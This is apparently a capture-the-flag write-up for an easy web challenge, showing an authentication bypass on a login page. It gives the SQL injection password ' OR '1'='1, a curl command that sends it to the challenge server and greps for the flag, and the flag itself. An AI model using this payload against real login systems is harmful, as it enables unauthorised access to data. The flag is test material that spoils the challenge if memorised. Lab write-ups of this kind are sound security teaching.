Difficulty: easy

Category: web

Author: xnull

Description:

### Company Database Login

You discovered a login page for a company database system. The credentials are unknown, but you need to gain access to retrieve sensitive information.

Find a way to bypass the authentication and log in.

Solution

On the login page, we use the following credentials to get a login as admin:

Username: admin
Password: ' OR '1'='1

curl -s https://d03c1ab0-9747-46dc-8732-67f967de7c88.ctf.endolum.io:1337/login -d "username=admin" -d "password=' OR '1'='1" \
| grep -o -E 'ENDLM{.*}'

Flag: ENDLM{4ad9a282ea5611e912206a02aa3fa11a6d01c866c485137e}

Solution#

Solution